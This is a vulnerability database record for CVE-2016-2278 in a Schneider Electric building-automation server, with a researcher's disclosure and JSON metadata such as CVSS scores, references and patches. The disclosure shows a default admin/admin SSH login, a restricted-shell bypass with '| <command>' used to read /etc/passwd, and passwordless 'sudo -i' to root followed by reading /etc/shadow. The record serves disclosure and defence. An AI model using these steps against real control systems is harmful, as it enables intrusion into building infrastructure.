var-201603-0043
Vulnerability from variot
Schneider Electric Struxureware Building Operations Automation Server AS 1.7 and earlier and AS-P 1.7 and earlier allows remote authenticated administrators to execute arbitrary OS commands by defeating an msh (aka Minimal Shell) protection mechanism. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. A remote attacker can exploit this vulnerability to bypass access control and execute arbitrary OS commands. Weak credential management CVE-ID: None [ Mitre, CVE? ]*
There are two primary users: a. root - password is not set by default - this is a problem as we will see later in the vuln findings - By default, root cannot SSH in. b. admin - default password is 'admin' - Anyone can remotely ssh in to the device using default admin/admin login.
The system / application allows a) weak creds to start with, and more importantly, b) vulnerable versions lacks the mechanism to forcefully have the user change the initial password on first use or later. This has been fixed in the latest version.
2. OS Command Injection
After logging in to the device over SSH, the 'admin' user - the only active, administrative user at this point - is provided a restricted shell (msh), which offers a small set of, application- specific functional options.
$ ssh -l admin Password:
Welcome! (use 'help' to list commands) admin@box:>
admin@box:> release NAME=SE2Linux ID=se2linux PRETTY_NAME=SE2Linux (Schneider Electric Embedded Linux) VERSION_ID=0.2.0.212
admin@box:>
admin@box:> help usage: help [command] Type 'help [command]' for help on a specific command.
Available commands: exit - exit this session ps - report a snapshot of the current processes readlog - read log files reboot - reboot the system setip - configure the network interface setlog - configure the logging setsnmp - configure the snmp service setsecurity - configure the security settime - configure the system time top - display Linux tasks uptime - tell how long the system has been running release - tell the os release details
Attempting to run any different command will give an error message.
However, this restricted shell functionality (msh) can be bypassed to execute underlying system commands, by appending '| ' to any of the above set of commands:
admin@box:> uptime | ls bin home lost+found root sys config include mnt run tmp dev lib opt sbin usr etc localization proc share var
admin@box:> uptime | cat /etc/passwd
root:x:0:0:root:/:/bin/sh daemon:x:2:2:daemon:/sbin:/bin/false messagebus:x:3:3:messagebus:/sbin:/bin/false ntp:x:102:102:ntp:/var/empty/ntp:/bin/false sshd:x:103:103:sshd:/var/empty:/bin/false app:x:500:500:Linux Application:/:/bin/false admin:x:1000:1000:Linux User,,,:/:/bin/msh
admin@box:> uptime | cat /etc/group root:x:0: wheel:x:1:admin daemon:x:2: messagebus:x:3: adm:x:5:admin power:x:20:app serial:x:21:app cio:x:22:app lon:x:23:app daemonsv:x:30:admin,app utmp:x:100: lock:x:101: ntp:x:102: sshd:x:103: app:x:500:admin admin:x:1000:admin
3. Privilege Escalation / access to root CVE-ID: None [ Mitre, CVE? ]
Since this is an administrative user, an attacker can exploit OS command injection to perform a variety of tasks from msh shell. But isn’t it better to get a root shell instead.!
As observed from Issue 1 above, root does not have a password set, and it is possible to use 'sudo -i' and become root. Note: sudo is not presented / offered to 'admin' in the set of functional options available thru msh.
admin@box:> sudo -i
We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things:
1) Respect the privacy of others.
2) Think before you type.
3) With great power comes great responsibility.
Password:
root@box:~> cat /etc/shadow root:!:16650:0:99999:7::: sshd:!:1:0:99999:7::: admin:$6$:16652:0:99999:7:::
+++++
The Automation Server (AS) is one functional component of the larger, StruxureWare Building Operation platform (SBO) solution / environment. The AS password gets sync’d to SBO application rbac. With the new release, the default AS password will be forcefully changed, and msh has been sufficiently improved to mitigate against command injection.
Issue 3, however, persists. Anyone with access to msh shell, can still drop in to root shell, and have some fun.
+++++
Best Regards, Karn Ganeshen
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201603-0043",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "struxureware building operations automation server as",
"scope": "lte",
"trust": 1.8,
"vendor": "schneider electric",
"version": "1.7"
},
{
"model": "struxureware building operations automation server as-p",
"scope": "eq",
"trust": 1.2,
"vendor": "schneider electric",
"version": null
},
{
"model": "struxureware building operations automation server as-p",
"scope": "eq",
"trust": 1.0,
"vendor": "schneider electric",
"version": "1.7"
},
{
"model": "struxureware building operations automation server as",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "struxureware building operations automation server as-p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "struxureware building operations automation server as-p",
"scope": "lte",
"trust": 0.8,
"vendor": "schneider electric",
"version": "1.7"
},
{
"model": "electric struxureware building operation application server",
"scope": "lte",
"trust": 0.6,
"vendor": "schneider",
"version": "\u003c=1.7"
},
{
"model": "struxureware building operations automation server as",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider electric",
"version": null
},
{
"model": "struxureware building operations automation server as",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider electric",
"version": "1.7"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "struxureware building operations automation server as",
"version": "*"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "struxureware building operations automation server as p",
"version": "1.7"
}
],
"sources": [
{
"db": "IVD",
"id": "5f237420-2351-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2016-01450"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001594"
},
{
"db": "CNNVD",
"id": "CNNVD-201603-002"
},
{
"db": "NVD",
"id": "CVE-2016-2278"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:schneider_electric:struxureware_building_operations_automation_server_as",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:struxureware_building_operations_automation_server_as_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:schneider_electric:struxureware_building_operations_automation_server_as-p",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:struxureware_building_operations_automation_server_as-p_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001594"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Karn Ganeshen",
"sources": [
{
"db": "PACKETSTORM",
"id": "136078"
}
],
"trust": 0.1
},
"cve": "CVE-2016-2278",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2016-2278",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2016-01450",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "5f237420-2351-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-91097",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2016-2278",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-2278",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2016-2278",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2016-01450",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201603-002",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "IVD",
"id": "5f237420-2351-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-91097",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "5f237420-2351-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2016-01450"
},
{
"db": "VULHUB",
"id": "VHN-91097"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001594"
},
{
"db": "CNNVD",
"id": "CNNVD-201603-002"
},
{
"db": "NVD",
"id": "CVE-2016-2278"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Schneider Electric Struxureware Building Operations Automation Server AS 1.7 and earlier and AS-P 1.7 and earlier allows remote authenticated administrators to execute arbitrary OS commands by defeating an msh (aka Minimal Shell) protection mechanism. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. A remote attacker can exploit this vulnerability to bypass access control and execute arbitrary OS commands. Weak credential management*\n*CVE-ID:* None *[ Mitre, CVE? ]*\n\nThere are two primary users:\na. root - password is not set by default - this is a problem as we will see\nlater in the vuln findings\n- By default, root cannot SSH in. \nb. admin - default password is \u0027admin\u0027\n- Anyone can remotely ssh in to the device using default admin/admin login. \n\nThe system / application allows a) weak creds to start with, and more\nimportantly, b) vulnerable versions lacks the mechanism to forcefully have\nthe user change the initial password on first use or later. This has been\nfixed in the latest version. \n\n*2. OS Command Injection*\n\nAfter logging in to the device over SSH, the \u0027admin\u0027 user - the only\nactive, administrative user at this point - is provided a restricted shell\n(msh), which offers a small set of, application- specific functional\noptions. \n\n$ ssh \u003cIP\u003e -l admin Password:\n\nWelcome! (use \u0027help\u0027 to list commands) admin@box:\u003e\n\nadmin@box:\u003e release\nNAME=SE2Linux\nID=se2linux\nPRETTY_NAME=SE2Linux (Schneider Electric Embedded Linux)\nVERSION_ID=0.2.0.212\n\nadmin@box:\u003e\n\nadmin@box:\u003e help\nusage: help [command]\nType \u0027help [command]\u0027 for help on a specific command. \n\nAvailable commands:\nexit - exit this session\nps - report a snapshot of the current processes readlog - read log files\nreboot - reboot the system\nsetip - configure the network interface\nsetlog - configure the logging\nsetsnmp - configure the snmp service\nsetsecurity - configure the security\nsettime - configure the system time\ntop - display Linux tasks\nuptime - tell how long the system has been running release - tell the os\nrelease details\n\nAttempting to run any different command will give an error message. \n\nHowever, this restricted shell functionality (msh) can be bypassed to\nexecute underlying system commands, by appending \u0027| \u003ccommand\u003e\u0027 to any of\nthe above set of commands:\n\nadmin@box:\u003e uptime | ls\nbin home lost+found root sys config include mnt run tmp dev lib opt sbin usr\netc localization proc share var\n\nadmin@box:\u003e uptime | cat /etc/passwd\n\nroot:x:0:0:root:/:/bin/sh daemon:x:2:2:daemon:/sbin:/bin/false\nmessagebus:x:3:3:messagebus:/sbin:/bin/false\nntp:x:102:102:ntp:/var/empty/ntp:/bin/false\nsshd:x:103:103:sshd:/var/empty:/bin/false app:x:500:500:Linux\nApplication:/:/bin/false admin:x:1000:1000:Linux User,,,:/:/bin/msh\n\nadmin@box:\u003e uptime | cat /etc/group root:x:0:\nwheel:x:1:admin\ndaemon:x:2:\nmessagebus:x:3:\nadm:x:5:admin\npower:x:20:app\nserial:x:21:app\ncio:x:22:app\nlon:x:23:app\ndaemonsv:x:30:admin,app\nutmp:x:100:\nlock:x:101:\nntp:x:102:\nsshd:x:103:\napp:x:500:admin\nadmin:x:1000:admin\n\n*3. Privilege Escalation / access to root*\n*CVE-ID:* None *[ Mitre, CVE? ]*\n\nSince this is an administrative user, an attacker can exploit OS command\ninjection to perform a variety of tasks from msh shell. But isn\u2019t it better\nto get a root shell instead.!\n\nAs observed from Issue 1 above, root does not have a password set, and it\nis possible to use \u0027sudo -i\u0027 and become root. \nNote: sudo is not presented / offered to \u0027admin\u0027 in the set of functional\noptions available thru msh. \n\nadmin@box:\u003e *sudo -i*\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n#1) Respect the privacy of others. \n#2) Think before you type. \n#3) With great power comes great responsibility. \n\nPassword:\n\n*root@box:~\u003e *cat /etc/shadow\nroot:!:16650:0:99999:7:::\nsshd:!:1:0:99999:7:::\nadmin:$6$\u003chash\u003e:16652:0:99999:7:::\n\n+++++\n\nThe Automation Server (AS) is one functional component of the larger,\nStruxureWare Building Operation platform (SBO) solution / environment. The\nAS password gets sync\u2019d to SBO application rbac. With the new release, the\ndefault AS password will be forcefully changed, and msh has been\nsufficiently improved to mitigate against command injection. \n\nIssue 3, however, persists. Anyone with access to msh shell, can still drop\nin to root shell, and have some fun. \n\n+++++\n-- \nBest Regards,\nKarn Ganeshen\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-2278"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001594"
},
{
"db": "CNVD",
"id": "CNVD-2016-01450"
},
{
"db": "IVD",
"id": "5f237420-2351-11e6-abef-000c29c66e3d"
},
{
"db": "VULHUB",
"id": "VHN-91097"
},
{
"db": "PACKETSTORM",
"id": "136078"
}
],
"trust": 2.52
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-91097",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-91097"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-2278",
"trust": 3.3
},
{
"db": "ICS CERT",
"id": "ICSA-16-061-01",
"trust": 2.5
},
{
"db": "SCHNEIDER",
"id": "SEVD-2016-025-01",
"trust": 1.8
},
{
"db": "EXPLOIT-DB",
"id": "39522",
"trust": 1.1
},
{
"db": "CNNVD",
"id": "CNNVD-201603-002",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2016-01450",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001594",
"trust": 0.8
},
{
"db": "IVD",
"id": "5F237420-2351-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "BID",
"id": "83796",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-91097",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "136078",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "5f237420-2351-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2016-01450"
},
{
"db": "VULHUB",
"id": "VHN-91097"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001594"
},
{
"db": "PACKETSTORM",
"id": "136078"
},
{
"db": "CNNVD",
"id": "CNNVD-201603-002"
},
{
"db": "NVD",
"id": "CVE-2016-2278"
}
]
},
"id": "VAR-201603-0043",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "5f237420-2351-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2016-01450"
},
{
"db": "VULHUB",
"id": "VHN-91097"
}
],
"trust": 1.9
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "5f237420-2351-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2016-01450"
}
]
},
"last_update_date": "2024-11-23T23:02:38.400000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SEVD-2016-025-01",
"trust": 0.8,
"url": "http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2016-025-01"
},
{
"title": "Schneider Electric Building Operation Application Server Operating System Command Injection Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/72148"
},
{
"title": "Schneider Electric StruxureWare Building Operation Application Server Fixes for operating system command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=60367"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-01450"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001594"
},
{
"db": "CNNVD",
"id": "CNNVD-201603-002"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-284",
"trust": 1.1
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-91097"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001594"
},
{
"db": "NVD",
"id": "CVE-2016-2278"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-16-061-01"
},
{
"trust": 1.7,
"url": "http://download.schneider-electric.com/files?p_doc_ref=sevd-2016-025-01"
},
{
"trust": 1.4,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2278"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/39522/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2278"
},
{
"trust": 0.1,
"url": "http://oreo.schneider-electric.com/flipflop/1739415603/index.htm?p_endoctype=technical%20leaflet\u0026p_reference=sevd-2016-025-01\u0026p_file_name=sevd-2016-025-01%20sbo%20as.pdf\u0026flipflop=1#/2"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-01450"
},
{
"db": "VULHUB",
"id": "VHN-91097"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001594"
},
{
"db": "PACKETSTORM",
"id": "136078"
},
{
"db": "CNNVD",
"id": "CNNVD-201603-002"
},
{
"db": "NVD",
"id": "CVE-2016-2278"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "5f237420-2351-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2016-01450"
},
{
"db": "VULHUB",
"id": "VHN-91097"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001594"
},
{
"db": "PACKETSTORM",
"id": "136078"
},
{
"db": "CNNVD",
"id": "CNNVD-201603-002"
},
{
"db": "NVD",
"id": "CVE-2016-2278"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-03-04T00:00:00",
"db": "IVD",
"id": "5f237420-2351-11e6-abef-000c29c66e3d"
},
{
"date": "2016-03-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-01450"
},
{
"date": "2016-03-02T00:00:00",
"db": "VULHUB",
"id": "VHN-91097"
},
{
"date": "2016-03-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001594"
},
{
"date": "2016-03-04T00:41:39",
"db": "PACKETSTORM",
"id": "136078"
},
{
"date": "2016-03-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201603-002"
},
{
"date": "2016-03-02T11:59:02.600000",
"db": "NVD",
"id": "CVE-2016-2278"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-03-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-01450"
},
{
"date": "2018-10-30T00:00:00",
"db": "VULHUB",
"id": "VHN-91097"
},
{
"date": "2016-03-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001594"
},
{
"date": "2016-03-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201603-002"
},
{
"date": "2024-11-21T02:48:07.730000",
"db": "NVD",
"id": "CVE-2016-2278"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201603-002"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Schneider Electric Building Operation Application Server Operating system command injection vulnerability",
"sources": [
{
"db": "IVD",
"id": "5f237420-2351-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2016-01450"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201603-002"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…